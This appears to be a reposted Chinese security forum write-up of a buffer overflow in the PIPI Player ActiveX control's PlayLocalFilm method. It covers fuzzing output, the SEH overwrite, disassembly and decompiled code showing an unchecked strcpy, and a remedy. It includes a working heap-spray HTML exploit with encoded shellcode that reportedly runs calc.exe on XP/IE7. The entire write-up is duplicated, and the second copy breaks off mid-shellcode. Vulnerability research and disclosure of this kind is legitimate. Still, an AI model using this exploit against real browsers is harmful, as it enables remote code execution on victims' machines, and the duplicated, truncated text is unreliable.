-
-
皮皮播放器Activex控件BOF漏洞
-
发表于: 2014-3-12 16:31 1592
-
新闻链接:http://www.2cto.com/Article/201403/284122.html
新闻时间:2014-03-08
新闻正文:皮皮播放器Activex控件BOF漏洞
通用型漏洞,fuzzing...
1、下载最新版本皮皮播放器,使用ComRaider进行fuzz
fuzz生成文件
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:A74BF134-5213-46B5-AF36-CE1888315DC7' id='target' />
<script language='vbscript'>
'File Generated by COMRaider v0.0.134 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\pipi\PIPIWebPlayer.ocx"
prototype = "Sub PlayLocalFilm ( ByVal lpFilmName As String )"
memberName = "PlayLocalFilm"
progid = "PIPIWebPlayerLib.PIPIWebPlayerCtrl"
argCount = 1
arg1=String(6164, "A")
target.PlayLocalFilm arg1
</script></job></package>
ComRaider列表发现异常信息,seh链被覆盖成41414141,典型的BOF一枚。
Exception Code: ACCESS_VIOLATION
Disasm: 15B7DDF MOV EAX,[EAX+4] (PIPIWebPlayer.DLL)
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
PIPIWebPlayer.15B7DDF PIPIWebPlayer.15B6FEF
PIPIWebPlayer.15B6FEF PIPIWebPlayer.15F1B9E
PIPIWebPlayer.15F1B9E 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
2、分析成因
Immunity Debugger,ida搞起,流程同上篇,此处略。
漏洞汇编地址在此处
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
01A91AF0 55 PUSH EBP
01A91AF1 8BEC MOV EBP,ESP
01A91AF3 6A FF PUSH -1
01A91AF5 68 48EAAD01 PUSH PIPIWebP.01ADEA48
01A91AFA 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
01A91B00 50 PUSH EAX
01A91B01 64:8925 00000000 MOV DWORD PTR FS:[0],ESP
01A91B08 81EC 68040000 SUB ESP,468
01A91B0E A1 0869AF01 MOV EAX,DWORD PTR DS:[1AF6908]
01A91B13 33C5 XOR EAX,EBP
01A91B15 8945 EC MOV DWORD PTR SS:[EBP-14],EAX
01A91B18 898D ACFBFFFF MOV DWORD PTR SS:[EBP-454],ECX
01A91B1E C745 FC 01000000 MOV DWORD PTR SS:[EBP-4],1
01A91B25 6A 08 PUSH 8
01A91B27 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B2D 81C1 90000000 ADD ECX,90
01A91B33 E8 6859FCFF CALL PIPIWebP.01A574A0
01A91B38 8B85 ACFBFFFF MOV EAX,DWORD PTR SS:[EBP-454]
01A91B3E 83B8 80050000 00 CMP DWORD PTR DS:[EAX+580],0
01A91B45 74 2A JE SHORT PIPIWebP.01A91B71
01A91B47 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B4D C781 84050000 00>MOV DWORD PTR DS:[ECX+584],0
01A91B57 6A 00 PUSH 0
01A91B59 68 60EA0000 PUSH 0EA60
01A91B5E 6A 14 PUSH 14
01A91B60 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B66 81C1 90000000 ADD ECX,90
01A91B6C E8 FF58FCFF CALL PIPIWebP.01A57470
01A91B71 8B95 ACFBFFFF MOV EDX,DWORD PTR SS:[EBP-454]
01A91B77 C682 84040000 01 MOV BYTE PTR DS:[EDX+484],1
01A91B7E 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
01A91B81 E8 AA29FEFF CALL PIPIWebP.01A74530
01A91B86 50 PUSH EAX
01A91B87 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C]
01A91B8D 50 PUSH EAX
01A91B8E E8 F1A30400 CALL <JMP.&MSVCR71.strcpy>
01A91B93 83C4 08 ADD ESP,8
01A91B96 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
01A91B99 E8 4254FCFF CALL PIPIWebP.01A56FE0
01A91B9E 0FB6C8 MOVZX ECX,AL
01A91BA1 85C9 TEST ECX,ECX
01A91BA3 0F84 01010000 JE PIPIWebP.01A91CAA
01A91BA9 8B95 ACFBFFFF MOV EDX,DWORD PTR SS:[EBP-454]
01A91BAF 83BA 3C020000 00 CMP DWORD PTR DS:[EDX+23C],0
01A91BB6 0F84 EC000000 JE PIPIWebP.01A91CA8
01A91BBC 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C]
01A91BC2 50 PUSH EAX
.....
01A91B8E E8 F1A30400 CALL <JMP.&MSVCR71.strcpy> 此处调用了strcpy没有检测数据的边界,导致BOF。
IDA看看反汇编成c的代码段
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
int __thiscall sub_67641AF0(void *this, char a2, int a3, int a4)
{
const char *v4; // eax@3
unsigned __int8 v5; // al@3
int v6; // ecx@3
const char *v8; // eax@17
int v9; // ecx@28
int v10; // ecx@30
char *v11; // [sp-14h] [bp-488h]@39
char *v12; // [sp-10h] [bp-484h]@39
int v13; // [sp-Ch] [bp-480h]@18
int v14; // [sp-8h] [bp-47Ch]@13
int v15; // [sp-4h] [bp-478h]@13
int v16; // [sp+0h] [bp-474h]@39
int v17; // [sp+4h] [bp-470h]@31
int v18; // [sp+8h] [bp-46Ch]@31
int v19; // [sp+Ch] [bp-468h]@28
int v20; // [sp+10h] [bp-464h]@28
int v21; // [sp+14h] [bp-460h]@26
int v22; // [sp+18h] [bp-45Ch]@13
int v23; // [sp+1Ch] [bp-458h]@7
int v24; // [sp+20h] [bp-454h]@1
char **v25; // [sp+24h] [bp-450h]@39
int *v26; // [sp+28h] [bp-44Ch]@31
int *v27; // [sp+2Ch] [bp-448h]@28
void *v28; // [sp+30h] [bp-444h]@25
int v29; // [sp+34h] [bp-440h]@28
int *v30; // [sp+38h] [bp-43Ch]@13
void *v31; // [sp+3Ch] [bp-438h]@9
void *v32; // [sp+40h] [bp-434h]@6
int v33; // [sp+44h] [bp-430h]@9
int v34; // [sp+48h] [bp-42Ch]@31
int v35; // [sp+4Ch] [bp-428h]@28
int v36; // [sp+50h] [bp-424h]@9
int v37; // [sp+54h] [bp-420h]@17
char Src; // [sp+58h] [bp-41Ch]@17
char Dir; // [sp+158h] [bp-31Ch]@17
char Source; // [sp+258h] [bp-21Ch]@3
char Filename; // [sp+360h] [bp-114h]@17
char Drive; // [sp+464h] [bp-10h]@17
int v43; // [sp+470h] [bp-4h]@1
v24 = (int)this;
v43 = 1;
sub_676074A0(8u);
if ( *(_DWORD *)(v24 + 1408) )
{
*(_DWORD *)(v24 + 1412) = 0;
sub_67607470(0x14u, 0xEA60u, 0);
}
*(_BYTE *)(v24 + 1156) = 1;
v4 = (const char *)unknown_libname_80(&a2);
strcpy(&Source, v4); //此处发生缓冲区溢出
v5 = sub_67606FE0(&a3);
v6 = v5;
if ( v5 )
{
if ( *(_DWORD *)(v24 + 572) && strcmp((const char *)(*(_DWORD *)(v24 + 572) + 4), &Source) )
{
v32 = operator new(0x620u);
LOBYTE(v43) = 2;
if ( v32 )
v23 = sub_6764F860(v32);
else
v23 = 0;
v33 = v23;
LOBYTE(v43) = 1;
v36 = v23;
strcpy((char *)(v23 + 4), &Source);
*(_DWORD *)(v23 + 1076) = 0;
v31 = *(void **)(v24 + 572);
operator delete(v31);
*(_DWORD *)(v24 + 572) = 0;
v6 = v36;
*(_DWORD *)(v24 + 572) = v36;
}
}
else
{
sub_67655450(v24 + 488);
}
if ( *(_DWORD *)(v24 + 1384) )
{
v15 = 0;
v14 = v6;
v30 = &v14;
v22 = sub_6761D410("BUTTON_FILMPLAYON");
sub_6764DC80(v14, v15);
}
if ( (unsigned __int8)sub_67606FE0(&a2) && (unsigned __int8)sub_67606FE0(&a3) )
{
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
unknown_libname_12(&a2);
LOBYTE(v43) = 3;
v15 = (int)&Src;
v14 = (int)&Filename;
v8 = (const char *)unknown_libname_80(&v37);
splitpath(v8, &Drive, &Dir, (char *)v14, (char *)v15);
unknown_libname_14(&Src);
if ( !(unsigned __int8)sub_67606FE0(&a3) )
{
v15 = (int)&Src;
v14 = a3;
v13 = (int)&Dir;
sub_67621A80((int)&v37, "%s%s%s%s.jfenc", (unsigned int)&Drive);
}
if ( *(_DWORD *)(v24 + 572) )
{
if ( !(unsigned __int8)sub_67606FE0(&a3) )
{
if ( (unsigned __int8)sub_67621AD0(0) )
{
v15 = *(_DWORD *)(v24 + 572) + 1036;
if ( sub_67606F90((unsigned __int8 *)v15) )
sub_67650200(v24);
}
}
}
if ( !*(_DWORD *)(v24 + 572) )
{
v28 = operator new(0x620u);
LOBYTE(v43) = 4;
if ( v28 )
v21 = sub_6764F860(v28);
else
v21 = 0;
v29 = v21;
LOBYTE(v43) = 3;
*(_DWORD *)(v24 + 572) = v21;
v15 = unknown_libname_80(&a2);
v14 = *(_DWORD *)(v24 + 572) + 4;
strcpy((char *)v14, (const char *)v15);
*(_DWORD *)(*(_DWORD *)(v24 + 572) + 1076) = a4;
v15 = unknown_libname_80(&a3);
v14 = *(_DWORD *)(v24 + 572) + 1036;
strcpy((char *)v14, (const char *)v15);
v15 = v9;
v27 = &v15;
v20 = sub_6761D410("TRACKBAR_FILMCTRL");
v19 = sub_67620D80(v15);
v35 = v19;
if ( !v19 )
{
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
sub_6765E090(0, -1);
if ( dword_676A5A60 )
{
v15 = v10;
v26 = &v15;
v18 = sub_6761D410("TRACKBAR_FILMCTRL");
v17 = sub_67620D80(v15);
v34 = v17;
if ( !v17 )
{
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
sub_6765E090(0, -1);
}
}
if ( *(_DWORD *)(v24 + 572) )
{
memset((void *)(v24 + 1196), 0, 0x54u);
v15 = *(_DWORD *)(v24 + 572) + 1036;
strcpy((char *)(v24 + 1196), (const char *)v15);
*(_DWORD *)(v24 + 1260) = *(_DWORD *)(*(_DWORD *)(v24 + 572) + 1028);
if ( *(_DWORD *)(v24 + 1192) )
{
v15 = -1;
v14 = *(_DWORD *)(v24 + 1192);
TerminateThread((HANDLE)v14, 0xFFFFFFFFu);
*(_DWORD *)(v24 + 1192) = 0;
}
*(_DWORD *)(v24 + 1192) = beginthread(sub_6764C7D0, 0, v24);
if ( *(_DWORD *)(v24 + 1192) == -1 )
*(_DWORD *)(v24 + 1192) = 0;
}
v15 = (int)&Src;
v14 = (int)&Filename;
v13 = (int)&Dir;
v12 = &Drive;
v11 = &Drive;
v25 = &v11;
v16 = unknown_libname_12(&v37);
sub_67642170((char)v11, (char)v12, v13, v14, (char *)v15);
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
3、poc
ActiveX溢出最简单的莫过于Heap Spray
POC
<html>
<body>
<object classid='clsid:A74BF134-5213-46B5-AF36-CE1888315DC7' id="target"></object>
<script>
shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
memory=new Array();
for( counter=0; counter<200; counter++)
memory[counter]= block + shellcode;
buffer='';
for( counter=0; counter<=1100; counter++)
buffer+=unescape("%0D%0D%0D%0D");
target.PlayLocalFilm(buffer);
</script>
</body>
</html>
xp,IE7下弹出calc.exe
由于是典型BOF,ALSR,DEP,是可以写POC的,还是等下回吧,太懒了。
修复方案:
strcpy要校验长度呀.
新闻时间:2014-03-08
新闻正文:皮皮播放器Activex控件BOF漏洞
通用型漏洞,fuzzing...
1、下载最新版本皮皮播放器,使用ComRaider进行fuzz
fuzz生成文件
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:A74BF134-5213-46B5-AF36-CE1888315DC7' id='target' />
<script language='vbscript'>
'File Generated by COMRaider v0.0.134 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\pipi\PIPIWebPlayer.ocx"
prototype = "Sub PlayLocalFilm ( ByVal lpFilmName As String )"
memberName = "PlayLocalFilm"
progid = "PIPIWebPlayerLib.PIPIWebPlayerCtrl"
argCount = 1
arg1=String(6164, "A")
target.PlayLocalFilm arg1
</script></job></package>
ComRaider列表发现异常信息,seh链被覆盖成41414141,典型的BOF一枚。
Exception Code: ACCESS_VIOLATION
Disasm: 15B7DDF MOV EAX,[EAX+4] (PIPIWebPlayer.DLL)
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
PIPIWebPlayer.15B7DDF PIPIWebPlayer.15B6FEF
PIPIWebPlayer.15B6FEF PIPIWebPlayer.15F1B9E
PIPIWebPlayer.15F1B9E 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
2、分析成因
Immunity Debugger,ida搞起,流程同上篇,此处略。
漏洞汇编地址在此处
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
01A91AF0 55 PUSH EBP
01A91AF1 8BEC MOV EBP,ESP
01A91AF3 6A FF PUSH -1
01A91AF5 68 48EAAD01 PUSH PIPIWebP.01ADEA48
01A91AFA 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
01A91B00 50 PUSH EAX
01A91B01 64:8925 00000000 MOV DWORD PTR FS:[0],ESP
01A91B08 81EC 68040000 SUB ESP,468
01A91B0E A1 0869AF01 MOV EAX,DWORD PTR DS:[1AF6908]
01A91B13 33C5 XOR EAX,EBP
01A91B15 8945 EC MOV DWORD PTR SS:[EBP-14],EAX
01A91B18 898D ACFBFFFF MOV DWORD PTR SS:[EBP-454],ECX
01A91B1E C745 FC 01000000 MOV DWORD PTR SS:[EBP-4],1
01A91B25 6A 08 PUSH 8
01A91B27 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B2D 81C1 90000000 ADD ECX,90
01A91B33 E8 6859FCFF CALL PIPIWebP.01A574A0
01A91B38 8B85 ACFBFFFF MOV EAX,DWORD PTR SS:[EBP-454]
01A91B3E 83B8 80050000 00 CMP DWORD PTR DS:[EAX+580],0
01A91B45 74 2A JE SHORT PIPIWebP.01A91B71
01A91B47 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B4D C781 84050000 00>MOV DWORD PTR DS:[ECX+584],0
01A91B57 6A 00 PUSH 0
01A91B59 68 60EA0000 PUSH 0EA60
01A91B5E 6A 14 PUSH 14
01A91B60 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B66 81C1 90000000 ADD ECX,90
01A91B6C E8 FF58FCFF CALL PIPIWebP.01A57470
01A91B71 8B95 ACFBFFFF MOV EDX,DWORD PTR SS:[EBP-454]
01A91B77 C682 84040000 01 MOV BYTE PTR DS:[EDX+484],1
01A91B7E 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
01A91B81 E8 AA29FEFF CALL PIPIWebP.01A74530
01A91B86 50 PUSH EAX
01A91B87 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C]
01A91B8D 50 PUSH EAX
01A91B8E E8 F1A30400 CALL <JMP.&MSVCR71.strcpy>
01A91B93 83C4 08 ADD ESP,8
01A91B96 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
01A91B99 E8 4254FCFF CALL PIPIWebP.01A56FE0
01A91B9E 0FB6C8 MOVZX ECX,AL
01A91BA1 85C9 TEST ECX,ECX
01A91BA3 0F84 01010000 JE PIPIWebP.01A91CAA
01A91BA9 8B95 ACFBFFFF MOV EDX,DWORD PTR SS:[EBP-454]
01A91BAF 83BA 3C020000 00 CMP DWORD PTR DS:[EDX+23C],0
01A91BB6 0F84 EC000000 JE PIPIWebP.01A91CA8
01A91BBC 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C]
01A91BC2 50 PUSH EAX
.....
01A91B8E E8 F1A30400 CALL <JMP.&MSVCR71.strcpy> 此处调用了strcpy没有检测数据的边界,导致BOF。
IDA看看反汇编成c的代码段
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
int __thiscall sub_67641AF0(void *this, char a2, int a3, int a4)
{
const char *v4; // eax@3
unsigned __int8 v5; // al@3
int v6; // ecx@3
const char *v8; // eax@17
int v9; // ecx@28
int v10; // ecx@30
char *v11; // [sp-14h] [bp-488h]@39
char *v12; // [sp-10h] [bp-484h]@39
int v13; // [sp-Ch] [bp-480h]@18
int v14; // [sp-8h] [bp-47Ch]@13
int v15; // [sp-4h] [bp-478h]@13
int v16; // [sp+0h] [bp-474h]@39
int v17; // [sp+4h] [bp-470h]@31
int v18; // [sp+8h] [bp-46Ch]@31
int v19; // [sp+Ch] [bp-468h]@28
int v20; // [sp+10h] [bp-464h]@28
int v21; // [sp+14h] [bp-460h]@26
int v22; // [sp+18h] [bp-45Ch]@13
int v23; // [sp+1Ch] [bp-458h]@7
int v24; // [sp+20h] [bp-454h]@1
char **v25; // [sp+24h] [bp-450h]@39
int *v26; // [sp+28h] [bp-44Ch]@31
int *v27; // [sp+2Ch] [bp-448h]@28
void *v28; // [sp+30h] [bp-444h]@25
int v29; // [sp+34h] [bp-440h]@28
int *v30; // [sp+38h] [bp-43Ch]@13
void *v31; // [sp+3Ch] [bp-438h]@9
void *v32; // [sp+40h] [bp-434h]@6
int v33; // [sp+44h] [bp-430h]@9
int v34; // [sp+48h] [bp-42Ch]@31
int v35; // [sp+4Ch] [bp-428h]@28
int v36; // [sp+50h] [bp-424h]@9
int v37; // [sp+54h] [bp-420h]@17
char Src; // [sp+58h] [bp-41Ch]@17
char Dir; // [sp+158h] [bp-31Ch]@17
char Source; // [sp+258h] [bp-21Ch]@3
char Filename; // [sp+360h] [bp-114h]@17
char Drive; // [sp+464h] [bp-10h]@17
int v43; // [sp+470h] [bp-4h]@1
v24 = (int)this;
v43 = 1;
sub_676074A0(8u);
if ( *(_DWORD *)(v24 + 1408) )
{
*(_DWORD *)(v24 + 1412) = 0;
sub_67607470(0x14u, 0xEA60u, 0);
}
*(_BYTE *)(v24 + 1156) = 1;
v4 = (const char *)unknown_libname_80(&a2);
strcpy(&Source, v4); //此处发生缓冲区溢出
v5 = sub_67606FE0(&a3);
v6 = v5;
if ( v5 )
{
if ( *(_DWORD *)(v24 + 572) && strcmp((const char *)(*(_DWORD *)(v24 + 572) + 4), &Source) )
{
v32 = operator new(0x620u);
LOBYTE(v43) = 2;
if ( v32 )
v23 = sub_6764F860(v32);
else
v23 = 0;
v33 = v23;
LOBYTE(v43) = 1;
v36 = v23;
strcpy((char *)(v23 + 4), &Source);
*(_DWORD *)(v23 + 1076) = 0;
v31 = *(void **)(v24 + 572);
operator delete(v31);
*(_DWORD *)(v24 + 572) = 0;
v6 = v36;
*(_DWORD *)(v24 + 572) = v36;
}
}
else
{
sub_67655450(v24 + 488);
}
if ( *(_DWORD *)(v24 + 1384) )
{
v15 = 0;
v14 = v6;
v30 = &v14;
v22 = sub_6761D410("BUTTON_FILMPLAYON");
sub_6764DC80(v14, v15);
}
if ( (unsigned __int8)sub_67606FE0(&a2) && (unsigned __int8)sub_67606FE0(&a3) )
{
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
unknown_libname_12(&a2);
LOBYTE(v43) = 3;
v15 = (int)&Src;
v14 = (int)&Filename;
v8 = (const char *)unknown_libname_80(&v37);
splitpath(v8, &Drive, &Dir, (char *)v14, (char *)v15);
unknown_libname_14(&Src);
if ( !(unsigned __int8)sub_67606FE0(&a3) )
{
v15 = (int)&Src;
v14 = a3;
v13 = (int)&Dir;
sub_67621A80((int)&v37, "%s%s%s%s.jfenc", (unsigned int)&Drive);
}
if ( *(_DWORD *)(v24 + 572) )
{
if ( !(unsigned __int8)sub_67606FE0(&a3) )
{
if ( (unsigned __int8)sub_67621AD0(0) )
{
v15 = *(_DWORD *)(v24 + 572) + 1036;
if ( sub_67606F90((unsigned __int8 *)v15) )
sub_67650200(v24);
}
}
}
if ( !*(_DWORD *)(v24 + 572) )
{
v28 = operator new(0x620u);
LOBYTE(v43) = 4;
if ( v28 )
v21 = sub_6764F860(v28);
else
v21 = 0;
v29 = v21;
LOBYTE(v43) = 3;
*(_DWORD *)(v24 + 572) = v21;
v15 = unknown_libname_80(&a2);
v14 = *(_DWORD *)(v24 + 572) + 4;
strcpy((char *)v14, (const char *)v15);
*(_DWORD *)(*(_DWORD *)(v24 + 572) + 1076) = a4;
v15 = unknown_libname_80(&a3);
v14 = *(_DWORD *)(v24 + 572) + 1036;
strcpy((char *)v14, (const char *)v15);
v15 = v9;
v27 = &v15;
v20 = sub_6761D410("TRACKBAR_FILMCTRL");
v19 = sub_67620D80(v15);
v35 = v19;
if ( !v19 )
{
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
sub_6765E090(0, -1);
if ( dword_676A5A60 )
{
v15 = v10;
v26 = &v15;
v18 = sub_6761D410("TRACKBAR_FILMCTRL");
v17 = sub_67620D80(v15);
v34 = v17;
if ( !v17 )
{
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
sub_6765E090(0, -1);
}
}
if ( *(_DWORD *)(v24 + 572) )
{
memset((void *)(v24 + 1196), 0, 0x54u);
v15 = *(_DWORD *)(v24 + 572) + 1036;
strcpy((char *)(v24 + 1196), (const char *)v15);
*(_DWORD *)(v24 + 1260) = *(_DWORD *)(*(_DWORD *)(v24 + 572) + 1028);
if ( *(_DWORD *)(v24 + 1192) )
{
v15 = -1;
v14 = *(_DWORD *)(v24 + 1192);
TerminateThread((HANDLE)v14, 0xFFFFFFFFu);
*(_DWORD *)(v24 + 1192) = 0;
}
*(_DWORD *)(v24 + 1192) = beginthread(sub_6764C7D0, 0, v24);
if ( *(_DWORD *)(v24 + 1192) == -1 )
*(_DWORD *)(v24 + 1192) = 0;
}
v15 = (int)&Src;
v14 = (int)&Filename;
v13 = (int)&Dir;
v12 = &Drive;
v11 = &Drive;
v25 = &v11;
v16 = unknown_libname_12(&v37);
sub_67642170((char)v11, (char)v12, v13, v14, (char *)v15);
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
3、poc
ActiveX溢出最简单的莫过于Heap Spray
POC
<html>
<body>
<object classid='clsid:A74BF134-5213-46B5-AF36-CE1888315DC7' id="target"></object>
<script>
shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
